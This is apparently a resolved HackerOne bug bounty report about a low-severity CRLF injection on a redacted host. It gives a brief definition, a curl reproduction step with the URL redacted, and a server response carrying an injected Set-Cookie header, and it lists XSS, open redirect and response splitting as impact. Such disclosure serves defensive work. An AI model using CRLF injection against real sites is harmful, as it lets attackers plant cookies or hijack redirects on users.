CRLF Inection at `██████████`
Low
Vulnerability Details
## Summary:
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
## Steps To Reproduce:
Navigate to this URL
█████:
```
┌──(azab㉿kali)-[~]
└─$ curl -i ███████
HTTP/1.1 307 Temporary Redirect
Date: █████ █████████ GMT
Content-Type: text/html
Content-Length: 164
Connection: keep-alive
Server: nginx
Location: ████████
Set-Cookie: CRLF_Injection_By_ze2pac
<html>
<head><title>307 Temporary Redirect</title></head>
<body>
<center><h1>307 Temporary Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>
```
## Impact
XSS, Open Redirect, HTTP Response Splitting... etc.
Actions
View on HackerOneReport Stats
- Report ID: 1943013
- State: Closed
- Substate: resolved
- Upvotes: 12